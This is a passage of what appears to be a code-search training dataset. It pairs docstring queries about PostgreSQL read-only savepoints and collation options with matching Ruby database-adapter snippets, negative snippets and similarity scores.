"0.5692907",
"0.5628751",
"0.5575133",
"0.5575133",
"0.5518805",
"0.5504294",
"0.5468508",
"0.53467554",
"0.53143233",
"0.53134865",
"0.52963495",
"0.5211512",
"0.5206623",
"0.51856744",
"0.5146709",
"0.51061195",
"0.509536",
"0.5079896",
"0.5078062",
"0.507582",
"0.50333816",
"0.50195354",
"0.5018583",
"0.49996987",
"0.4993746",
"0.49844766",
"0.49821228",
"0.49789977",
"0.49691677",
"0.49574947",
"0.49350795",
"0.4928571",
"0.49018326",
"0.49018326",
"0.4901525",
"0.48943514",
"0.4852806",
"0.48494792",
"0.48455817",
"0.48145074",
"0.4793017",
"0.47913107",
"0.4784024",
"0.47832406",
"0.47584924",
"0.47566053",
"0.47547272",
"0.47520134",
"0.47520134",
"0.47517073",
"0.47504413",
"0.47441614",
"0.47311452",
"0.47129986",
"0.47075883",
"0.46920627",
"0.46855506",
"0.4676963",
"0.4673785",
"0.46618974",
"0.46558735",
"0.46419528",
"0.46411112",
"0.4633891",
"0.46318588",
"0.46311495",
"0.46309024",
"0.462721",
"0.46140617",
"0.46058443",
"0.46007103",
"0.45986104",
"0.45818996",
"0.45744225",
"0.45709264",
"0.45709264",
"0.45669696",
"0.45607695",
"0.45538485",
"0.45515293",
"0.45484987",
"0.4540121",
"0.45399892",
"0.4539105",
"0.45377868",
"0.45372474",
"0.45345998",
"0.45199692",
"0.45199692",
"0.45199692",
"0.45080295",
"0.45036337",
"0.44965398",
"0.44909868",
"0.44755977",
"0.44755977"
] |
0.7401804
|
1
|
Set the READ ONLY transaction setting per savepoint, as PostgreSQL supports that.
|
def begin_savepoint(conn, opts)
  super
  unless (read_only = opts[:read_only]).nil?
    log_connection_execute(conn, "SET TRANSACTION READ #{read_only ? 'ONLY' : 'WRITE'}")
  end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def with_transaction(read_only: false, &block)\n @env.transaction(read_only, &block)\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n read_only = opts[:read_only]\n deferrable = opts[:deferrable]\n if level || !read_only.nil? || !deferrable.nil?\n sql = String.new\n sql << \"SET TRANSACTION\"\n sql << \" ISOLATION LEVEL #{Sequel::Database::TRANSACTION_ISOLATION_LEVELS[level]}\" if level\n sql << \" READ #{read_only ? 'ONLY' : 'WRITE'}\" unless read_only.nil?\n sql << \" #{'NOT ' unless deferrable}DEFERRABLE\" unless deferrable.nil?\n log_connection_execute(conn, sql)\n end\n end",
"def transaction_disabled=(_arg0); end",
"def force_begin_read_write\n @grpc_transaction = @connection.session.create_transaction\n end",
"def read_only\n false\n end",
"def read_only\n true\n end",
"def set_repository_writable!\n with_lock do\n raise ActiveRecord::RecordNotSaved, _('Database update failed') unless\n _update_repository_read_only_column(false)\n\n nil\n end\n end",
"def transaction_disabled; end",
"def set_readonly\n readonly! if persisted? && !parent\n end",
"def read_only_recommended\n @read_only = 2\n end",
"def read_only?; end",
"def read_only?; end",
"def transaction_isolation_levels\n {\n read_committed: 'READ COMMITTED',\n repeatable_read: 'REPEATABLE READ',\n serializable: 'SERIALIZABLE'\n }\n end",
"def use_transactions; end",
"def use_transactions; end",
"def txn_read_preference\n rp = txn_options[:read] ||\n @client.read_preference\n Mongo::Lint.validate_underscore_read_preference(rp)\n rp\n end",
"def set_readonly_option!(options) #:nodoc:\n if options[:piggy]\n options[:readonly] = true\n else\n old_set_readonly_option!(options)\n end\n end",
"def set_repository_read_only!(skip_git_transfer_check: false)\n with_lock do\n raise RepositoryReadOnlyError, _('Git transfer in progress') if\n !skip_git_transfer_check && git_transfer_in_progress?\n\n raise RepositoryReadOnlyError, _('Repository already read-only') if\n _safe_read_repository_read_only_column\n\n raise ActiveRecord::RecordNotSaved, _('Database update failed') unless\n _update_repository_read_only_column(true)\n\n nil\n end\n end",
"def set_readonly_access(grant_access=true, manual_set=false)\n unless Rails.env.test? || self.queued_for_deletion || self.detached\n if manual_set || self.public_changed? || self.new_record?\n if self.firecloud_workspace.present? && self.firecloud_project.present? && ApplicationController.read_only_firecloud_client.present?\n access_level = self.public? ? 'READER' : 'NO ACCESS'\n if !grant_access # revoke all access\n access_level = 'NO ACCESS'\n end\n Rails.logger.info \"#{Time.zone.now}: setting readonly access on #{self.name} to #{access_level}\"\n readonly_acl = ApplicationController.firecloud_client.create_workspace_acl(ApplicationController.read_only_firecloud_client.issuer, access_level, false, false)\n ApplicationController.firecloud_client.update_workspace_acl(self.firecloud_project, self.firecloud_workspace, readonly_acl)\n end\n end\n end\n end",
"def is_read_only=(value)\n @is_read_only = value\n end",
"def autocommit=(value)\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def enable_doublewrite()\n PureHailDB.ib_cfg_set(\"doublewrite\", :bool, true)\n end",
"def set_transaction_variables\n sessionFactory = HibernateUtil.getSessionFactory(\"serverconf\")\n dialect = sessionFactory.getDialect\n if dialect.class == Java::EeRiaXroadCommonDb::CustomPostgreSQLDialect\n # If we are running on top of Postgres, the name of the logged-in\n # user must be made available within the transaction, for use\n # when updating the history table.\n # The value of user_name will go out of scope when the transaction\n # ends.\n query = @session.createSQLQuery(\n \"SET LOCAL xroad.user_name='#{current_user.name}'\")\n query.executeUpdate()\n end\n end",
"def readonly!\n @readonly = true\n end",
"def synchronous_commit=(value)\n raise ArgumentError, \"argument must be true or false\" unless value == true || value == false\n\n execute \"SET #{'LOCAL' if open_transactions > 0} synchronous_commit TO #{value ? 'ON' : 'OFF'}\"\n end",
"def readonly! #:nodoc:\n @readonly = true\n end",
"def begin_transaction read_only: nil, previous_transaction: nil, read_time: nil\n if read_only\n transaction_options = Google::Cloud::Datastore::V1::TransactionOptions.new\n transaction_options.read_only = \\\n Google::Cloud::Datastore::V1::TransactionOptions::ReadOnly.new \\\n read_time: read_time_to_timestamp(read_time)\n\n end\n if previous_transaction\n transaction_options ||= \\\n Google::Cloud::Datastore::V1::TransactionOptions.new\n rw = Google::Cloud::Datastore::V1::TransactionOptions::ReadWrite.new(\n previous_transaction: previous_transaction.encode(\"ASCII-8BIT\")\n )\n transaction_options.read_write = rw\n end\n service.begin_transaction project_id: project, database_id: database, transaction_options: transaction_options\n end",
"def supports_transaction_isolation_levels?\n false\n end",
"def set_default_permissions!\n # Always allow to read the id\n let :read, :id\n # These shouldn't change after the first save.\n let :write, [ :id, :created_at ], :if => :new?\n # These can always change.\n let :write, :updated_at\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def autocommit=(p1)\n #This is a stub, used for indexing\n end",
"def set_locking_strategy\n if @config.enable_locking\n @lock = Aws::SessionStore::DynamoDB::Locking::Pessimistic.new(@config)\n else\n @lock = Aws::SessionStore::DynamoDB::Locking::Null.new(@config)\n end\n end",
"def read_only! key\n set_data! key, :read_only, true\n self\n end",
"def readwrite_user\n super\n end",
"def readonly\n true\n end",
"def mark_as_read()\n update_attribute('read', true)\n end",
"def supports_transaction_isolation?\n true\n end",
"def disable_doublewrite()\n PureHailDB.ib_cfg_set(\"doublewrite\", :bool, false)\n end",
"def within_transaction; end",
"def within_transaction; end",
"def supports_transaction_isolation_levels?\n true\n end",
"def read_only?\n !!(@db && @db.graph && @db.read_only?)\n end",
"def supports_transaction_isolation_levels?\n true\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def paranoid_permissions\n true\n end",
"def add_txn_opts!(command, read)\n command.tap do |c|\n # The read concern should be added to any command that starts a transaction.\n if starting_transaction?\n # https://jira.mongodb.org/browse/SPEC-1161: transaction's\n # read concern overrides collection/database/client read concerns,\n # even if transaction's read concern is not set.\n # Read concern here is the one sent to the server and may\n # include afterClusterTime.\n if rc = c[:readConcern]\n rc = rc.dup\n rc.delete(:level)\n end\n if txn_read_concern\n if rc\n rc.update(txn_read_concern)\n else\n rc = txn_read_concern.dup\n end\n end\n if rc.nil? || rc.empty?\n c.delete(:readConcern)\n else\n c[:readConcern ] = Options::Mapper.transform_values_to_strings(rc)\n end\n end\n\n # We need to send the read concern level as a string rather than a symbol.\n if c[:readConcern]\n c[:readConcern] = Options::Mapper.transform_values_to_strings(c[:readConcern])\n end\n\n if c[:commitTransaction]\n if max_time_ms = txn_options[:max_commit_time_ms]\n c[:maxTimeMS] = max_time_ms\n end\n end\n\n # The write concern should be added to any abortTransaction or commitTransaction command.\n if (c[:abortTransaction] || c[:commitTransaction])\n if @already_committed\n wc = BSON::Document.new(c[:writeConcern] || txn_write_concern || {})\n wc.merge!(w: :majority)\n wc[:wtimeout] ||= 10000\n c[:writeConcern] = wc\n elsif txn_write_concern\n c[:writeConcern] ||= txn_write_concern\n end\n end\n\n # A non-numeric write concern w value needs to be sent as a string rather than a symbol.\n if c[:writeConcern] && c[:writeConcern][:w] && c[:writeConcern][:w].is_a?(Symbol)\n c[:writeConcern][:w] = c[:writeConcern][:w].to_s\n end\n end\n end",
"def transactional\n @transactional ||= getTransactionalData()\n end",
"def txn_read_concern\n # Read concern is inherited from client but not db or collection.\n txn_options[:read_concern] || @client.read_concern\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n if (jdbc_level = JDBC_TRANSACTION_ISOLATION_LEVELS[level]) &&\n conn.getMetaData.supportsTransactionIsolationLevel(jdbc_level)\n _trans(conn)[:original_jdbc_isolation_level] = conn.getTransactionIsolation\n log_connection_yield(\"Transaction.isolation_level = #{level}\", conn){conn.setTransactionIsolation(jdbc_level)}\n end\n end",
"def readonly?; true; end",
"def readonly?; true; end",
"def readonly?; true; end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def read_permitted?\n true\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def mark_as_read!\n update_attributes(read: true)\n end",
"def readonly?\n options[:read_only] == true\n end",
"def locked_transaction(&block)\n unless connection.open_transactions.zero?\n raise \"locked_transaction cannot be called from within another transaction!\"\n end\n unsafe_locked_transaction do\n yield if block_given?\n end\n end",
"def ignore_transaction\n builder.ignore_transaction if builder\n end",
"def create_or_update_with_paranoid\n self.class.disable_paranoid { create_or_update_without_paranoid }\n end",
"def persistence_mode\n super\n end",
"def set_readwrite_user(opts)\n opts = check_params(opts,[:rw_user_info])\n super(opts)\n end",
"def mark_as_read\n update_attributes(is_read: true)\n end",
"def begin_db_transaction\n @transaction = @connection.transaction('READ COMMITTED')\n end",
"def test_supports_transaction_isolation\n assert ActiveRecord::Base.connection.supports_transaction_isolation?\n\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_uncommitted)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:read_committed)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:repeatable_read)\n assert ActiveRecord::Base.connection.supports_transaction_isolation_level?(:serializable)\n end",
"def target_sql_mode=(_arg0); end",
"def mark_as_read\n self.update(read: true)\n end",
"def read_only?\n @read_only\n end",
"def autocommit(flag)\n query \"set autocommit=#{flag ? 1 : 0}\"\n self\n end",
"def read_data_permitted?\n return write_data_permitted?\n end",
"def run(*args, &block)\n Sequel::Model.db.transaction(rollback: :always, auto_savepoint: true) { super }\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def readonly?\n true\n end",
"def mark_as_read\n update_attributes(:is_read => true)\n end",
"def mark_as_read\n update_attributes(:is_read => true)\n end",
"def with_transaction(&block)\n base_model.transaction(&block)\n end",
"def transaction(opts={:auto_enable => false})\n @transaction_level||=0\n @transaction_level+=1\n session do\n raise_if_transaction_running\n @transaction ||= true\n raise Error.cannot_obtain_transaction_lock if not lock_transaction\n begin\n yield\n # get_transaction in case cfgsave or cfgenable was run in transaction block\n # if there is no transaction we do not need to run it\n # if there is transaction but opend by someone else then t\n cfg_save if @transaction_level==1 && get_transaction\n rescue => e\n abort_transaction\n raise e\n end \n end\n ensure\n @transaction_level-=1\n @transaction = nil if @transaction_level==0\n end",
"def supports_prepared_transactions?\n false\n end",
"def supports_transactional_ddl?\n false\n end",
"def read_only?\n @read_only\n end",
"def set_persistence_mode(opts)\n opts = check_params(opts,[:modes])\n super(opts)\n end",
"def request_is_readonly?\n true\n end",
"def disable_rollback\n data[:disable_rollback]\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def supports_transactional_ddl?\n true\n end",
"def transaction(mode = :deferred, &block)\n @db.transaction(mode, &block)\n end",
"def read_only\n @attributes[:read_only]\n end",
"def test_should_not_crash_selects_in_the_double_read_only_window\n ActiveRecord::Base.connection\n $mysql_master.set_rw(false)\n $mysql_slave.set_rw(false)\n assert_equal $mysql_master, master_connection\n 100.times do\n User.first\n end\n end"
] |
[
"0.6960527",
"0.6353735",
"0.62602395",
"0.60868007",
"0.6068373",
"0.60130394",
"0.5990826",
"0.58925563",
"0.5890557",
"0.5845283",
"0.57550824",
"0.57550824",
"0.5740366",
"0.56175214",
"0.56175214",
"0.55855775",
"0.5568516",
"0.5552127",
"0.55378616",
"0.5520403",
"0.5509703",
"0.55085033",
"0.55032367",
"0.5497485",
"0.5467872",
"0.54586643",
"0.5429937",
"0.53990924",
"0.53987795",
"0.5357913",
"0.5357913",
"0.53440535",
"0.5339869",
"0.5329696",
"0.5321719",
"0.5308512",
"0.53052396",
"0.5301688",
"0.5289729",
"0.528566",
"0.528566",
"0.52832043",
"0.52769077",
"0.527017",
"0.52494043",
"0.52494043",
"0.52447814",
"0.5241454",
"0.52355963",
"0.5232266",
"0.519545",
"0.5176758",
"0.5176758",
"0.5176758",
"0.5176706",
"0.5170364",
"0.51552075",
"0.5149747",
"0.51404643",
"0.51283324",
"0.51092565",
"0.5095564",
"0.5072108",
"0.50644314",
"0.505984",
"0.50591266",
"0.5053773",
"0.5035983",
"0.50323135",
"0.50250393",
"0.5024039",
"0.502181",
"0.50194377",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.50119275",
"0.5010293",
"0.5010293",
"0.5005136",
"0.5003005",
"0.49844667",
"0.49840957",
"0.4981584",
"0.4979045",
"0.4972563",
"0.49719766",
"0.49685383",
"0.49676338",
"0.49651602",
"0.49616447",
"0.4925767"
] |
0.7488052
|
0
|
Literalize non-String collate options. This is because unquoted collations are folded to lowercase, and PostgreSQL uses mixed-case or capitalized collations.
|
def column_definition_collate_sql(sql, column)
  if collate = column[:collate]
    collate = literal(collate) unless collate.is_a?(String)
    sql << " COLLATE #{collate}"
  end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def collation\n nil\n end",
"def collation\n select_value(\n \"SELECT pg_database.datcollate\" <<\n \" FROM pg_database\" <<\n \" WHERE pg_database.datname LIKE '#{current_database}'\",\n 'SCHEMA')\n end",
"def column_definition_collate_sql(sql, column)\n if collate = column[:collate]\n sql << \" COLLATE #{collate}\"\n end\n end",
"def set_standard_conforming_strings\n if postgresql_version >= 80200 # N/A (or read-only in PG 8.1)\n self.standard_conforming_strings=(true)\n end\n # AR 4.2 no longer does the hustle since its claiming PG >= 8.2\n # ... execute('SET standard_conforming_strings = on', 'SCHEMA')\n end",
"def set_standard_conforming_strings\n execute('SET standard_conforming_strings TO ON') rescue nil\n end",
"def collation\n show_variable \"collation_database\"\n end",
"def prepare_column_options(column)\n super.tap do |spec|\n spec[:encoding] = \"'#{column.sql_type_metadata.encoding}'\" if column.sql_type_metadata.encoding.present?\n end\n end",
"def collation\n @collation ||= show_variable('collation_connection') || 'utf8_general_ci'\n end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.dup\n def default.inspect\n \"Sequel::LiteralString.new(#{super})\"\n end\n default\n end\n end",
"def collation_enabled?\n $collation_enabled ||= scanned_client_server!.features.collation_enabled?\nend",
"def get_string_normalization_options\n\t\tdic = @db::Dictionary.where(:title => @dic_name).first\n\t\treturn { lowercased: dic[:lowercased], hyphen_replaced: dic[:hyphen_replaced], stemmed: dic[:stemmed] } if dic.present?\n\tend",
"def sanitize_select_options(options)#:nodoc:\n o = options.dup\n select = o.delete :select\n o[:override_select] = select ? select_column_sql(select) : ' * '\n o\n end",
"def collation\n 'ucs_binary'\n end",
"def standard_conforming_strings=(enable)\n client_min_messages = self.client_min_messages\n begin\n self.client_min_messages = 'panic'\n value = enable ? \"on\" : \"off\"\n execute(\"SET standard_conforming_strings = #{value}\", 'SCHEMA')\n @standard_conforming_strings = ( value == \"on\" )\n rescue\n @standard_conforming_strings = :unsupported\n ensure\n self.client_min_messages = client_min_messages\n end\n end",
"def flag_option_sql(attrs, key, off=\"NO#{key}\".upcase, on=key.to_s.upcase, implicit=IMPLICIT_FLAG_ATTRIBUTES[key])\n\t case attrs[key]\n\t when NilClass, implicit\n\t when TrueClass then on\n\t when FalseClass then off\n\t else raise Error, \"Unsupported or invalid #{key} option\"\n\t end\n\t end",
"def _format_sql(sql)\n sql = sql.delete '\"'\n sql.downcase\n end",
"def uses_clob_for_text?\n false\n end",
"def prepare_options\n normalize_options\n String.allow_color = !options[:no_color]\n end",
"def encode_options\n {invalid: :replace, undef: :replace, replace: '?'}\n end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.to_s\n def default.inspect\n \"#{super}.lit\"\n end\n default\n end\n end",
"def supports_index_collation?\n false\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def collation\n if @object.kind_of?(Linkage::Data)\n @object.collation\n else\n nil\n end\n end",
"def non_sql_option?(key)\n NON_SQL_OPTIONS.include?(key)\n end",
"def convert_boolean_strings\n %i{ambiguous_ref_bases use_all_contigs include_low_hmes polyploidy}.each do | symbol |\n if @options.key?(symbol)\n @options[symbol] = @options[symbol] == 'false' ? false : true\n end\n end\n end",
"def set_standard_conforming_strings\n self.standard_conforming_strings=(true)\n end",
"def sql_valuify\n nil? ? 'NULL' : \"'#{to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\").gsub(/\\t/, \"\\\\t\").gsub(/\\r/, \"\\\\r\").gsub(/\\n/, \"\\\\n\")}'\"\n end",
"def collation=(value)\n @collation = value\n end",
"def sql_modes; end",
"def collation\n return @collation\n end",
"def sql_string\n StringExpression.new(:NOOP, self)\n end",
"def sql_string\n StringExpression.new(:NOOP, self)\n end",
"def substitute_from_config_libraries(sql)\n Admin::ConfigLibrary.make_substitutions! sql, :sql\n sql\n end",
"def table_options_sql(options)\n\t sql = []\n\t sql << flag_option_sql(options, :parallel)\n\t sql << flag_option_sql(options, :logging)\n\t sql << flag_option_sql(options, :monitoring)\n\t sql << \"TABLESPACE #{quote_identifier(options[:tablespace])}\" if options[:tablespace]\n\t sql << compress_option_sql(options)\n\t sql << options[:options] if String === options[:options]\n\t sql.compact.join ' '\n\t end",
"def unquoted\n with_opts(:quoted=>false)\n end",
"def create_language_sql(name, opts=OPTS)\n \"CREATE#{' OR REPLACE' if opts[:replace] && server_version >= 90000}#{' TRUSTED' if opts[:trusted]} LANGUAGE #{name}#{\" HANDLER #{opts[:handler]}\" if opts[:handler]}#{\" VALIDATOR #{opts[:validator]}\" if opts[:validator]}\"\n end",
"def column_references_sql(options)\n sql = [super(options)]\n\t sql << flag_option_sql(options, :rely)\n\t sql << flag_option_sql(options, :enable, 'DISABLE')\n\t sql << flag_option_sql(options, :validate)\n\t sql.join ' '\n end",
"def options_with_escape\n @options.reject { |k,v| k == :eager_loaded }\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << v.gsub(\"'\", \"''\") << \"'\"\n end",
"def frozen_string_literal_specified?; end",
"def prefer_unicode\n context[:prefer_unicode]\n end",
"def can_perform_case_insensitive_comparison_for?(column)\n @case_insensitive_cache ||= {}\n @case_insensitive_cache[column.sql_type] ||= begin\n sql = <<-end_sql\n SELECT exists(\n SELECT * FROM pg_proc\n WHERE proname = 'lower'\n AND proargtypes = ARRAY[#{quote column.sql_type}::regtype]::oidvector\n ) OR exists(\n SELECT * FROM pg_proc\n INNER JOIN pg_cast\n ON ARRAY[casttarget]::oidvector = proargtypes\n WHERE proname = 'lower'\n AND castsource = #{quote column.sql_type}::regtype\n )\n end_sql\n select_value(sql, 'SCHEMA')\n end\n end",
"def options_for(table)\n result = execute(\"show table status like '#{table}'\")\n engine = result.first[1]\n if engine !~ /inno/i #inno is default so do nothing for it in order not to clutter the migration\n \"ENGINE=#{engine}\" \n else\n nil\n end\n end",
"def _normalize_options(options); end",
"def camelize_options(options)\n options.dup.each do |k,v|\n options[k.to_s.split('_').inject([]){|c,word| c.push(c.empty? ? word : word.capitalize)}.join] = v\n end\n end",
"def generate_upsert_options\n if options.empty?\n ''\n else\n ' USING ' <<\n options.map do |key, value|\n serialized_value =\n case key\n when :consistency then value.to_s.upcase\n when :timestamp then (value.to_f * 1_000_000).to_i\n else value\n end\n \"#{key.to_s.upcase} #{serialized_value}\"\n end.join(' AND ')\n end\n end",
"def literalize(name); end",
"def connection_configuration_sqls(opts=@opts)\n sqls = []\n\n sqls << \"SET standard_conforming_strings = ON\" if typecast_value_boolean(opts.fetch(:force_standard_strings, true))\n\n cmm = opts.fetch(:client_min_messages, :warning)\n if cmm && !cmm.to_s.empty?\n cmm = cmm.to_s.upcase.strip\n unless VALID_CLIENT_MIN_MESSAGES.include?(cmm)\n raise Error, \"Unsupported client_min_messages setting: #{cmm}\"\n end\n sqls << \"SET client_min_messages = '#{cmm.to_s.upcase}'\"\n end\n\n if search_path = opts[:search_path]\n case search_path\n when String\n search_path = search_path.split(\",\").map(&:strip)\n when Array\n # nil\n else\n raise Error, \"unrecognized value for :search_path option: #{search_path.inspect}\"\n end\n sqls << \"SET search_path = #{search_path.map{|s| \"\\\"#{s.gsub('\"', '\"\"')}\\\"\"}.join(',')}\"\n end\n\n sqls\n end",
"def options_text(alt_option_config_attr = nil)\n alt_option_config_attr ||= self.class.option_configs_attr\n return unless alt_option_config_attr\n\n send(alt_option_config_attr).dup\n end",
"def sql_literal(object)\n object.literal(to_s)\n end",
"def code_point_collation_elements(code_points)\n explicit_collation_elements(code_points) || implicit_collation_elements(code_points)\n end",
"def type_literal_generic_string(column)\n if column[:text]\n :text\n elsif column[:fixed]\n \"char(#{column[:size]||default_string_column_size})\"\n elsif column[:text] == false || column[:size]\n \"varchar(#{column[:size]||default_string_column_size})\"\n else\n :text\n end\n end",
"def with_quoted_identifiers(s)\n s.gsub(/\"(\\w+)\"/) { |m|\n if ActiveRecord::Base.configurations[:test]['adapter'] =~ /oracle/i\n m.upcase\n else\n m\n end\n }\n end",
"def literal(v)\n case v\n when LiteralString\n v\n when String\n \"'#{v.gsub(/\\\\/, \"\\\\\\\\\\\\\\\\\").gsub(/'/, \"''\")}'\"\n when Integer, Float\n v.to_s\n when BigDecimal\n v.to_s(\"F\")\n when NilClass\n NULL\n when TrueClass\n BOOL_TRUE\n when FalseClass\n BOOL_FALSE\n when Symbol\n symbol_to_column_ref(v)\n when ::Sequel::SQL::Expression\n v.to_s(self)\n when Array\n v.all_two_pairs? ? literal(v.sql_expr) : (v.empty? ? '(NULL)' : \"(#{v.collect{|i| literal(i)}.join(COMMA_SEPARATOR)})\")\n when Hash\n literal(v.sql_expr)\n when Time, DateTime\n v.strftime(TIMESTAMP_FORMAT)\n when Date\n v.strftime(DATE_FORMAT)\n when Dataset\n \"(#{v.sql})\"\n else\n raise Error, \"can't express #{v.inspect} as a SQL literal\"\n end\n end",
"def compress_option_sql(attrs)\n\t case value=attrs[:compress]\n\t when Fixnum, Integer then \"COMPRESS(#{value})\"\n\t else flag_option_sql attrs, :compress\n\t end\n end",
"def force_string!(*keys)\n keys.each do |h|\n raise UserError, \"force_string!: #{h} not a column in table\" unless column(h)\n\n column(h).force_string!\n end\n self\n end",
"def to_sparql(**options)\n \"UCASE(\" + operands.last.to_sparql(**options) + \")\"\n end",
"def ignored_translation_table_colums(klass); end",
"def sql_quote(value)\n value = value.to_s.downcase if %i[nil null NULL].include?(value)\n # noinspection RubyMismatchedReturnType\n case value\n when nil, 'nil', 'null', 'NULL' then nil\n when /^-?\\d+$/ then value.to_i\n when SQL_NUMBER then value.to_f\n when String, Symbol then \"'#{value}'\"\n else value\n end\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << db.synchronize(@opts[:server]){|c| c.escape(v)} << \"'\"\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << db.synchronize(@opts[:server]){|c| c.escape_string(v)} << \"'\"\n end",
"def connection_configuration_sqls\n sqls = super\n sqls << \"SET DateStyle = 'ISO'\" if @use_iso_date_format\n sqls\n end",
"def create_table_statement(model)\n \"#{super} ENGINE = InnoDB CHARACTER SET #{character_set} COLLATE #{collation}\"\n end",
"def camelize( option=nil )\n if option == :lower\n String.string_camelize(self, false)\n else\n String.string_camelize(self)\n end\n end",
"def test_mysql_text_not_null_defaults_non_strict\n using_strict(false) do\n with_text_blob_not_null_table do |klass|\n assert_equal '', klass.columns_hash['non_null_blob'].default\n assert_equal '', klass.columns_hash['non_null_text'].default\n\n assert_nil klass.columns_hash['null_blob'].default\n assert_nil klass.columns_hash['null_text'].default\n\n instance = klass.create!\n\n assert_equal '', instance.non_null_text\n assert_equal '', instance.non_null_blob\n\n assert_nil instance.null_text\n assert_nil instance.null_blob\n end\n end\n end",
"def literal_string_append(sql, v)\n sql << \"'\" << ::Mysql.quote(v) << \"'\"\n end",
"def prepare_for_sql_in_clause\n \"(#{self.to_string_no_brackets})\"\n end",
"def literal_string_append(sql, v)\n sql << APOS << db.synchronize{|c| c.escape_string(v)} << APOS\n end",
"def select_table_options_sql(sql)\n sql << \" WITH #{@opts[:table_options]}\" if @opts[:table_options]\n end",
"def literal_string_append(sql, v)\n db.synchronize(@opts[:server]){|c| sql << c.quote(v)}\n end",
"def _literal_table_sort(tables)\n tables.sort_by{|s| literal(s)}\n end",
"def type_literal_generic_string(column)\n if column[:text]\n uses_clob_for_text? ? :clob : :text\n elsif column[:fixed]\n \"char(#{column[:size]||default_string_column_size})\"\n else\n \"varchar(#{column[:size]||default_string_column_size})\"\n end\n end",
"def variant_column\n \"option_value_#{ order_in_good }\"\n end",
"def make_sql_friendly( name )\n return name.strip.gsub( \"'\", \"''\" )\n end",
"def build_mode_from_options(options)\n if options[:mode]\n case options[:mode]\n when String\n return options[:mode]\n when Symbol\n return options[:mode].to_s.upcase\n else\n raise TypeError.new(INVALID_TYPE_MSG)\n end\n else\n return \"ASC\"\n end\n end",
"def target_sql_mode=(_arg0); end",
"def lit(*args)\n args.empty? ? self : SQL::PlaceholderLiteralString.new(self, args)\n end",
"def collate!(other_hash)\n replace(collate(other_hash))\n end",
"def literal_string_append(sql, s)\n sql << APOS << s.to_s.gsub(STRING_ESCAPE_RE){|m| STRING_ESCAPES[m]} << APOS\n end",
"def get_database_option(value)\n return value.nil? ? nil : \"Initial Catalog=#{value}\"\n end",
"def sql_strings(value)\n case value\n when String\n \"'#{value}'\"\n when Numeric\n value.to_s\n else\n \"null\"\n end\n end",
"def literal_string(v)\n \"'#{v.gsub(\"'\", \"''\")}'\"\n end",
"def generate_upsert_options\n if options.empty?\n ''\n else\n ' USING ' <<\n options.map do |key, value|\n serialized_value =\n case key\n when :timestamp then (value.to_f * 1_000_000).to_i\n else value\n end\n \"#{key.to_s.upcase} #{serialized_value}\"\n end.join(' AND ')\n end\n end",
"def sanitize_field_options(options={})\n options.stringify_keys.reject {|k, v| %w(vertical_align label edit req lock auto popup url position help).include?(k)}.symbolize_keys\n end",
"def `(s)\n Sequel::Deprecation.deprecate(\"Using Sequel#VirtualRow#` to create a literal SQL fragment\", \"Use Sequel.lit instead\")\n Sequel::LiteralString.new(s)\n end",
"def quote_column_if_needed(column); end",
"def set_locale_from_options_inline\n <<-EOL\nif options[:locale]\n #{\"Mobility.enforce_available_locales!(options[:locale])\" if I18n.enforce_available_locales}\n locale = options[:locale].to_sym\n options[:locale] &&= !!locale\nelse\n locale = Mobility.locale\nend\nEOL\n end",
"def initialize(opts = {})\n opts = opts.dup\n pg_version = opts.delete(:pg_version)\n if pg_version.is_a?( String )\n pg_version = pg_version.split( '.' ).map( &:to_i )\n end\n pg_version ||= []\n\n super\n\n # Phrase support starts in 9.6\n if ( pg_version <=> [9,6] ) >= 0\n # Handle what PG-sensitive chracters we can early as\n # whitespace. This can't include anything part of HumanQL,\n # e.g. ':' as used for scopes, so deal with the remainder\n # below.\n self.spaces = /[[:space:]*!<>\\0\\\\]+/.freeze\n else\n # Disable quote tokens\n self.lquote = nil\n self.rquote = nil\n # As above but add DQUOTE as well.\n self.spaces = /[[:space:]*!<>\\0\\\\\"]+/.freeze\n end\n\n # Use by custom #norm_phrase_tokens as a superset of the\n # #lparen, #rparen token patterns removed by default. In\n # PostgreSQL, the '|' and '&' still need to be filtered. Other\n # freestanding punctuation tokens are best removed entirely.\n @phrase_token_rejects = /\\A[()|&':]\\z/.freeze\n\n # SQUOTE is a problem only when at beginning of term.\n @lead_squote = /\\A'/.freeze\n\n # COLON is always a problem, but since its also part of Human QL\n # (scopes) it can't be included earlier in 